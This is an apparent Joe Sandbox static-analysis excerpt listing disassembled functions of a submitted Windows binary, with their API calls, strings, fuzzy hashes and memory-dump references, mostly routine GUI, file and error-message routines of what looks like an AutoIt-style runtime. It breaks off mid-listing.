HANDLE=, xrefs: 003FAC2C
CLASSNAME=, xrefs: 003FAC70
ACTIVE, xrefs: 003FAC0E
ALL, xrefs: 003FACC7
[ALL, xrefs: 003FACD9
[HANDLE:, xrefs: 003FAC3F
[CLASS:, xrefs: 003FAC83

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 7b83afb9ba0d1b437b87acf560d0cd5f199b623855464380084f0cf5246ea94e
Instruction ID: 50fa0a18cbf4c6e7e6eaf599964c356dfa03dc4b122452ef6256939124046003
Opcode Fuzzy Hash: 7b83afb9ba0d1b437b87acf560d0cd5f199b623855464380084f0cf5246ea94e
Instruction Fuzzy Hash: 5A31C471A48609A7DA16EA60ED43FBE77689F10751F30003AF905B90D2EF556F08C656

Function 00414FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00415013
LoadCursorW.USER32(00000000,00007F00), ref: 0041501E
LoadCursorW.USER32(00000000,00007F03), ref: 00415029
LoadCursorW.USER32(00000000,00007F8B), ref: 00415034
LoadCursorW.USER32(00000000,00007F01), ref: 0041503F
LoadCursorW.USER32(00000000,00007F81), ref: 0041504A
LoadCursorW.USER32(00000000,00007F88), ref: 00415055
LoadCursorW.USER32(00000000,00007F80), ref: 00415060
LoadCursorW.USER32(00000000,00007F86), ref: 0041506B
LoadCursorW.USER32(00000000,00007F83), ref: 00415076
LoadCursorW.USER32(00000000,00007F85), ref: 00415081
LoadCursorW.USER32(00000000,00007F82), ref: 0041508C
LoadCursorW.USER32(00000000,00007F84), ref: 00415097
LoadCursorW.USER32(00000000,00007F04), ref: 004150A2
LoadCursorW.USER32(00000000,00007F02), ref: 004150AD
LoadCursorW.USER32(00000000,00007F89), ref: 004150B8
GetCursorInfo.USER32(?), ref: 004150C8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 2447217a471ea9d0cf4807825dcc534b8434095f44db6e162e6d99cff3093ba6
Instruction ID: 73411b3957e38589dacb8f6a70ac95192c901179daab230eac212babbd435478
Opcode Fuzzy Hash: 2447217a471ea9d0cf4807825dcc534b8434095f44db6e162e6d99cff3093ba6
Instruction Fuzzy Hash: B43103B1E08319AADB109FB68C8999FBFE8FB48750F50453BA50CE7280DA7865418E95

Function 0042A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042A259
DestroyWindow.USER32(?,?), ref: 0042A2D3

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0042A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0042A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0042A382
DestroyWindow.USER32(00000000), ref: 0042A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003A0000,00000000), ref: 0042A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0042A3F4
GetDesktopWindow.USER32 ref: 0042A40D
GetWindowRect.USER32(00000000), ref: 0042A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0042A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0042A444

Part of subcall function 003A25DB: GetWindowLongW.USER32(?,000000EB), ref: 003A25EC

Strings

0, xrefs: 0042A26F
tooltips_class32, xrefs: 0042A346, 0042A3D4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 16aa88fc085c3dfbf91c85208249f0b2f0ed21a1aefdb55ead71778385382638
Instruction ID: 2948c04fa1c0851dc789ba56fdbbc7ed460d4d49b90423fb6dc843e767460069
Opcode Fuzzy Hash: 16aa88fc085c3dfbf91c85208249f0b2f0ed21a1aefdb55ead71778385382638
Instruction Fuzzy Hash: 7371AC74240205AFD721DF28DC48F6777E5FB88704F84452EF9858B2A0D7B8E916CB6A

Function 00424392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00424424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0042446F

Strings

EXISTS, xrefs: 004244D8
UNCHECK, xrefs: 0042464B
GETTEXT, xrefs: 004245C2
ISCHECKED, xrefs: 004245F2
COLLAPSE, xrefs: 004244B5
CHECK, xrefs: 0042448F
SELECT, xrefs: 00424620
GETSELECTED, xrefs: 0042457F
EXPAND, xrefs: 00424521
GETITEMCOUNT, xrefs: 00424551
GETTOTALCOUNT, xrefs: 00424456

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: ed393600ddc09138cadb3d368ad940d8feac5ebd07a533fe2047fe654acba45a
Instruction ID: d976151d2c711eb1b3568efc0571e274d9107ac535fb09b7b679eca2a3e19a8d
Opcode Fuzzy Hash: ed393600ddc09138cadb3d368ad940d8feac5ebd07a533fe2047fe654acba45a
Instruction Fuzzy Hash: AA915B742043119BCB05EF10C451B6EB7A5EF96350F44886EE8966F3A2CB39ED4ACB85

Function 0042B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0042B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004291C2), ref: 0042B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0042B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0042B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0042B9C3
FreeLibrary.KERNEL32(?), ref: 0042B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0042B9DF
DestroyIcon.USER32(?,?,?,?,?,004291C2), ref: 0042B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0042BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0042BA17

Part of subcall function 003C2EFD: __wcsicmp_l.LIBCMT ref: 003C2F86

Strings

.exe, xrefs: 0042B84A
.dll, xrefs: 0042B86D
.icl, xrefs: 0042B82A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 61de8e096838f2e10c9a3906d856623193ecaddbe9f1b9a119d80284ea663088
Instruction ID: 63af6d50099c9b1f274822fb6f9a976bf66885ae373233b9c3d93acafac48088
Opcode Fuzzy Hash: 61de8e096838f2e10c9a3906d856623193ecaddbe9f1b9a119d80284ea663088
Instruction Fuzzy Hash: 3661EFB1A00225BAEB14DF64DC41FBF77A8FB08710F90412AF915DA1C1DB78AD85D7A4

Function 0040DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0040DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0040DCF8
__wsplitpath.LIBCMT ref: 0040DD56
_wcscat.LIBCMT ref: 0040DD6E
_wcscat.LIBCMT ref: 0040DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0040DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 0040DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 0040DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 0040DDFC
_wcscpy.LIBCMT ref: 0040DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0040DE47

Strings

*.*, xrefs: 0040DE02

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2408fb4f0e87e489b93cdd24b0442285255035105ac954098f6ad96a4817bfa1
Instruction ID: a558633b2838fef1abd0b0829f38e85f5812533b6a7675ac223a872a464a6646
Opcode Fuzzy Hash: 2408fb4f0e87e489b93cdd24b0442285255035105ac954098f6ad96a4817bfa1
Instruction Fuzzy Hash: 6F615D725042059FD710EF60C844A9FB3E8FF89314F04492EF999EB251DB35E949CB96

Function 00409C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00409C7F

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00409CA0
__swprintf.LIBCMT ref: 00409CF9
__swprintf.LIBCMT ref: 00409D12
_wprintf.LIBCMT ref: 00409DB9
_wprintf.LIBCMT ref: 00409DD7

Strings

"%s" (%d) : ==> %s:, xrefs: 00409DD2
"%s" (%d) : ==> %s:%s%s, xrefs: 00409DB4
Error: , xrefs: 00409D81
Line %d (File "%s"):, xrefs: 00409CF3, 00409D0C
^ ERROR , xrefs: 00409D4E
Incorrect parameters to object property !, xrefs: 00409D5B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: faa5bb59ae73d879bcf38305f636d8ac7a5234ddaa1ce948c4894f2a964c33b0
Instruction ID: 361bf43764d5b86176dfa8e75fc6d7745204c253aece94813c8b3540229d82b1
Opcode Fuzzy Hash: faa5bb59ae73d879bcf38305f636d8ac7a5234ddaa1ce948c4894f2a964c33b0
Instruction Fuzzy Hash: CC519531900509AACF16EBE0DD86EEEB779EF05300F600066F505761A2EB352F59DB65

Function 0040A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

CharLowerBuffW.USER32(?,?), ref: 0040A3CB
GetDriveTypeW.KERNEL32 ref: 0040A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0040A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0040A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0040A4C5

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

Strings

close cd wait, xrefs: 0040A4B0
set cd door , xrefs: 0040A466
open , xrefs: 0040A427
closed, xrefs: 0040A3DF, 0040A3E8
type cdaudio alias cd wait, xrefs: 0040A443
wait, xrefs: 0040A482
open, xrefs: 0040A3F2
close, xrefs: 0040A3D1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 5659e7f91ab571898e24744e1e37d4e60e2422c31679690c843f8e2bb7b6f4e8
Instruction ID: d964ebaaabde8895ffe7ae37bbcf3cea804cd9cef2af6d7a9cf3167a5c676eb4
Opcode Fuzzy Hash: 5659e7f91ab571898e24744e1e37d4e60e2422c31679690c843f8e2bb7b6f4e8
Instruction Fuzzy Hash: 00515F751043059FC701EF10C88596BB3E8EF99718F50886EF896AB292DB35ED0ACB56

Function 003FF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,003DE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003FF8DF
LoadStringW.USER32(00000000,?,003DE029,00000001), ref: 003FF8E8

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,003DE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003FF90A
LoadStringW.USER32(00000000,?,003DE029,00000001), ref: 003FF90D
__swprintf.LIBCMT ref: 003FF95D
__swprintf.LIBCMT ref: 003FF96E
_wprintf.LIBCMT ref: 003FFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003FFA2E

Strings

Line %d:, xrefs: 003FF968
^ ERROR, xrefs: 003FF9C3
Error: , xrefs: 003FF9E5
Line %d (File "%s"):, xrefs: 003FF957
%s (%d) : ==> %s: %s %s, xrefs: 003FFA12

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 2204a5a1411a83ebfdcd0dcc9b27e769b4280a4cd1d7549e4873b64ef672b2e6
Instruction ID: 6cb9cc96d2c8a08bfc38e4ddbea0b0e9443db2d317031086cfff08b4f8739446
Opcode Fuzzy Hash: 2204a5a1411a83ebfdcd0dcc9b27e769b4280a4cd1d7549e4873b64ef672b2e6
Instruction Fuzzy Hash: E4412E7290010DAACF16FBE0DD96EEE7778EF15310F500069B905BA092EB355F09CB65

Function 0042BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00429207,?,?), ref: 0042BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00429207,?,?,00000000,?), ref: 0042BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00429207,?,?,00000000,?), ref: 0042BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00429207,?,?,00000000,?), ref: 0042BA85
GlobalLock.KERNEL32(00000000), ref: 0042BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00429207,?,?,00000000,?), ref: 0042BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0042BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00429207,?,?,00000000,?), ref: 0042BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00429207,?,?,00000000,?), ref: 0042BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00432CAC,?), ref: 0042BAD7
GlobalFree.KERNEL32(00000000), ref: 0042BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0042BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0042BB36
DeleteObject.GDI32(00000000), ref: 0042BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0042BB74

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 86df8bcccdd29c69e2e029c842b65dc9a900d6eec83597863e990ca294694a71
Instruction ID: 956434a5f5ab95a4e7378bb2c88be05d1a2a164f15392c849c6a358f135f1208
Opcode Fuzzy Hash: 86df8bcccdd29c69e2e029c842b65dc9a900d6eec83597863e990ca294694a71
Instruction Fuzzy Hash: 9A414875600204EFDB219F65EC88EABBBB8EB89711F904079F905D7260C774AD06CB64

Function 0040D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0040DA10
_wcscat.LIBCMT ref: 0040DA28
_wcscat.LIBCMT ref: 0040DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0040DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040DA63
GetFileAttributesW.KERNEL32(?), ref: 0040DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0040DAA7

Strings

*.*, xrefs: 0040DAE6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 90d9dab093b523ec500f8a3124af25d5a7a240aa7bbd0c26f2daef82395683f4
Instruction ID: c511d68711819463a504de368323ca77b1282868a35c0ca4c2e1b50b04f40fb8
Opcode Fuzzy Hash: 90d9dab093b523ec500f8a3124af25d5a7a240aa7bbd0c26f2daef82395683f4
Instruction Fuzzy Hash: CC8164B1A043419FCB24DFA4C844A6BB7E4AF89710F14483FF889EB291D638D949CB56

Function 0042C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0042C1FC
GetFocus.USER32 ref: 0042C20C
GetDlgCtrlID.USER32(00000000), ref: 0042C217
_memset.LIBCMT ref: 0042C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0042C36D
GetMenuItemCount.USER32(?), ref: 0042C38D
GetMenuItemID.USER32(?,00000000), ref: 0042C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0042C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0042C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0042C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0042C489

Strings

0, xrefs: 0042C33A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0112f1cd94bf573963c9de710d1c779a37dfbc40919eca6c0de7efc9a4b6d1c1
Instruction ID: a74747c53af47d4d4516aa1dfb1e3e38a6b75ffa52f45028597756cb7d20a997
Opcode Fuzzy Hash: 0112f1cd94bf573963c9de710d1c779a37dfbc40919eca6c0de7efc9a4b6d1c1
Instruction Fuzzy Hash: 04819F70608321AFD720DF14E884A6FBBE4FB88314F90492EF99597251D774D905CBAA

Function 0041731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0041738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0041739B
CreateCompatibleDC.GDI32(?), ref: 004173A7
SelectObject.GDI32(00000000,?), ref: 004173B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00417408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00417444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00417468
SelectObject.GDI32(00000006,?), ref: 00417470
DeleteObject.GDI32(?), ref: 00417479
DeleteDC.GDI32(00000006), ref: 00417480
ReleaseDC.USER32(00000000,?), ref: 0041748B

Strings

(, xrefs: 00417410

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 964680942dd7dd860f1d1c512815d22a148b7f5f0fa378568bc8bf438b44160e
Instruction ID: a1ffaac65fdf33cdff2459635768bd056b922915365221c9b3a809b9b19ef3a3
Opcode Fuzzy Hash: 964680942dd7dd860f1d1c512815d22a148b7f5f0fa378568bc8bf438b44160e
Instruction Fuzzy Hash: 3E515871A04209EFCB25CFA8CC84EAFBBB9EF48310F54842EF95A97210C735A845CB54

Function 003A6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 003C0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003A6B0C,?,00008000), ref: 003C0973
